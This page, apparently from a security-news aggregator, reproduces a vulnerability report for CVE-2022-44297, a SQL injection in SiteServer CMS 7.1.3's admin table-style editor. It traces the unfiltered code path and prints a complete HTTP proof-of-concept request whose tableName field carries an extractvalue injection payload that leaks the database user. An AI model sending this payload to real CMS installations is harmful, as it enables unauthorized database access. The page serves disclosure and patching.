Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44297: background sql inject · Issue #3490 · siteserver/cms

SiteServer CMS 7.1.3 has a SQL injection vulnerability the background.

CVE
Open in Source
#sql#vulnerability#web#windows#js#java#auth#ibm#firefox

Environmental information:sscms7.1.3+mysql(background administrator)

Vulnerability details

api/admin/common/tableStyle/layerEditor

step1

\SSCMS.Web\Controllers\Admin\Common\TableStyle\LayerEditorController.Submit.cs#update function

step2

After entering the InsertObjectAsync method of \cms-sscms-v7.1.3\src\Datory\Utils\RepositoryUtils.Insert.cs

The table is directly passed into the sql statement without filtering
Finally, the returned result has not yet been filtered and other operations on the sql statement
resulting in the occurrence of sql vulnerabilities
Vulnerability to reproduce

exploit result
`
POST /api/admin/common/tableStyle/layerEditor HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 338
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU
Content-Type: application/json;charset=UTF-8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Origin: http://192.168.3.129
Referer: http://192.168.3.129/ss-admin/common/tableStyleLayerEditor/?siteId=1&tableName=siteserver_Site&relatedIdentities=1%2C0&attributeName=weichat
Accept-Encoding: gzip

{"attributeName":"weichat","customizeCode":null,"defaultValue":"1","displayName":"111","height":0,"helpText":"11","horizontal":false,"inputType":"Image","isRapid":true,"items":null,"rapidValues":"","relatedFieldId":null,"relatedIdentities":"1,0","tableName":"siteserver_Site’and/**/extractvalue(1,concat(char(126),user()))and’","taxis":1}

`

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE